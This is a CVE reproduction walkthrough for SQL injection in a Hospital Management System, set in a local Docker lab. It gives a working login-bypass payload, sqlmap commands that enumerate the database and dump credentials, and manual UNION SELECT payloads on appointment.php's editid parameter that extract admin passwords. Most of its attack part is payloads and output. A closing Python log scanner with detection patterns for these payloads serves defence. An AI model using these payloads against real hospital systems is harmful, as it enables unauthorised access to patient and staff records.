
Tool preparation:
1. Kali
2. VM virtual machine
3. Docker environment
4. CMS system overview:
A Hospital Management System (HMS) is a computer- or web-based system that helps manage the operations of a hospital or any medical institution. The system or software helps make the entire workflow paperless. It integrates all information about patients, doctors, staff, hospital administration details and so on into a single piece of software, with sections for the various professionals that make up a hospital.
Environment preparation:
1. Start the Docker environment
systemctl start docker #start manually
systemctl enable docker #start automatically at boot
2. Verify Docker:
docker version #verify the installation
systemctl status docker.service #verify the service is running
docker info #verify the registry mirror is in effect
3. Pull the CVE-2022-25491 image

4. View the image files
Use docker images to list all images on the Docker host
5. Start the image

6. Check the local IP to get the target URL
http://192.168.192.128:8888/
Vulnerability reproduction phase (sqlmap all-in):
1. Open the login screen:

2. Enter the login page

3. Capture the request and bypass the login with the universal password
loginid=admin&password=123456987'+or+1=1+--++&submit=Login
4. This goes straight into the backend, which confirms a SQL injection vulnerability

5. Capture the request, save it as 1.txt, and append * at each position to be tested for SQL injection
POST /adminlogin.php HTTP/1.1
Host: 192.168.192.128:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.192.128:8888
Connection: keep-alive
Referer: http://192.168.192.128:8888/adminlogin.php
Cookie: PHPSESSID=5av1rkettgfrkgjl7bakchcvdr; _ga=GA1.1.859320655.1765826294; _gid=GA1.1.1338934917.1765826294; _ga_J1DQF09WZC=GS2.1.s1765826295$o1$g1$t1765826880$j52$l0$h0; _gat=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
loginid=admin*&password=12345678*&submit=Login
6. Run sqlmap with the following command
sqlmap -r 1.txt
7. Use sqlmap to enumerate the database names
sqlmap -r 1.txt --dbs
Database names obtained:
hms
information_schema
mysql
performance_schema
8. Use sqlmap to enumerate the table names:
sqlmap -r 1.txt -D "hms" --tables
Table names obtained
[18 tables]
+----------------------+
| admin |
| user |
| appointment |
| billing |
| billing_records |
| department |
| doctor |
| doctor_timings |
| medicine |
| orders |
| patient |
| payment |
| prescription |
| prescription_records |
| room |
| service_type |
| treatment |
| treatment_records |
+----------------------+
9. Use sqlmap to get all column names in the user table
sqlmap -r 1.txt -D "hms" -T "user" --columns
All column names obtained:
[7 columns]
+--------------------+-------------+
| Column | Type |
+--------------------+-------------+
| createddateandtime | datetime |
| email | varchar(50) |
| loginname | varchar(50) |
| mobileno | varchar(15) |
| password | varchar(10) |
| patientname | varchar(50) |
| userid | int(11) |
+--------------------+-------------+
10. Use sqlmap to dump the loginname and password data
sqlmap -r 1.txt -D "hms" -T "user" -C "userid,loginname,password" --dump
loginname and password data obtained
[1 entry]
+--------+-----------+----------+
| userid | loginname | password |
+--------+-----------+----------+
| 1 | admin | admin |
+--------+-----------+----------+
Vulnerability reproduction phase (manual injection)
1. Open the login screen:

2. Enter the login page

3. Capture the request and bypass the login with the universal password
loginid=admin&password=123456987'+or+1=1+--++&submit=Login
4. This goes straight into the backend, which confirms a SQL injection vulnerability

5. From the CVE site we learn that the vulnerability is in the editid parameter of appointment.php.
First visit appointment.php and enter arbitrary input; nothing changes, so add the editid parameter

6. First determine the closing character: entering 1 or 1'--+ returns a normal response, while 1' produces an error, so the value is closed by a single quote.

7. Determine the column count: ?editid=1' order by 10--+ still succeeds at exactly 10.

8. Determine the echo position: the output shows the echo position is the tenth column
?editid=1' union select 1,2,3,4,5,6,7,8,9,10--+
9. Extract the current connected user
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,user() --+
root@localhost
10. Extract the current database name
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,database()--+
hms
11. Extract the version information
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,version()--+
10.3.27-MariaDB-0+deb10u1
12. Extract the table names:
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(table_name) from information_schema.tables where table_schema='hms' --+
treatment_records,payment,user,admin,treatment,doctor,appointment,patient,orders,billing_records,prescription_records,department,prescription,room,service_type,doctor_timings,medicine,billing
13. Get the column names of the user table
?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema='hms' and table_name='user' --+
userid,loginname,password,patientname,mobileno,email,createddateandtime
14. Get the data
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(userid,loginname,password) from user --+
1adminadmin
15. In practice, however, the backend login form requires at least 8 characters, so this value does not match when entered:
Looking at the login options again, there are only admin/doctor/patient, so look up these three tables among the table names; start with the admin login information
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(column_name) from information_schema.columns where table_schema='hms' and table_name='admin' --+
adminid,adminname,loginid,password,status,usertype
16. Now look at the username and password:
payload:?editid=0' union select 1,2,3,4,5,6,7,8,9,group_concat(adminid,adminname,loginid,password,status,usertype) from admin --+
1Kabiradmin123456789Active
17. The corresponding account and password here are admin / 123456789; logging in, there is nothing much of value to exploit

18. Finally, just check the version number:
Clearly a Linux target, and of course there is no way to upload a webshell either. That concludes this CVE reproduction; the whole process required no bypass at all, sqlmap ran and everything came straight out.
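As an added defender-side example (not part of the original write-up), here is a small Python access-log scanner that flags the request shapes used in the two reproduction phases above: the ' or 1=1 login bypass, the order by column-count probe, union select, information_schema enumeration, and, because editid on appointment.php should only ever be an integer, any non-numeric value of that parameter. The log lines, timestamps and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed combined-format access-log lines (not captured from any real host);
# the query strings reproduce the payload shapes shown in the write-up.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Dec/2025:10:00:01 +0000] "GET /appointment.php?editid=1 HTTP/1.1" 200 512
198.51.100.7 - - [15/Dec/2025:10:00:05 +0000] "GET /appointment.php?editid=1%27+order+by+10--%2B HTTP/1.1" 200 512
198.51.100.7 - - [15/Dec/2025:10:00:09 +0000] "GET /appointment.php?editid=0%27+union+select+1,2,3,4,5,6,7,8,9,database()--%2B HTTP/1.1" 200 640
198.51.100.7 - - [15/Dec/2025:10:00:12 +0000] "GET /appointment.php?editid=0%27+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name)+from+information_schema.tables+where+table_schema%3D%27hms%27+--%2B HTTP/1.1" 200 900
203.0.113.9 - - [15/Dec/2025:10:01:00 +0000] "GET /appointment.php?editid=42 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Each rule is named after the stage of the manual injection it detects.
RULES = [
    ("auth-bypass",  re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),          # ' or 1=1
    ("column-count", re.compile(r"'\s*order\s+by\s+\d+", re.I)),            # ' order by N
    ("union-probe",  re.compile(r"'\s*union\s+select\b", re.I)),            # ' union select ...
    ("schema-enum",  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("comment-tail", re.compile(r"--\s*\+?\s*$")),                          # trailing --+
]

def classify(raw):
    """Return the rule names matched by a URL-encoded query string or POST body."""
    decoded = unquote_plus(raw)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    # appointment.php?editid= is a numeric row id; anything else is a type violation.
    params = parse_qs(raw, keep_blank_values=True)
    if "editid" in params and not all(v.strip().isdigit() for v in params["editid"]):
        hits.append("editid-not-integer")
    return hits

def scan_log(text):
    """Return (ip, target, hits) for every request line that matched at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(urlsplit(m["target"]).query)
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target, ",".join(hits))
```

The same classify() can be run over POST bodies captured by a WAF or reverse proxy, which is where the adminlogin.php bypass from step 3 would appear.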